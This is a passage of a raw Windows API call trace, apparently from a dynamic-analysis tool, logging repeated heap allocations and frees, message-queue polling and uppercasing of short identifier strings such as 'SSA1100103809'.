0x2a78430 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0103.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0103.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0103.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.038] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.038] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0103.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.039] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0103.039] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0103.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.040] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0103.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0103.041] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0103.043] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.043] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0103.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0103.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: 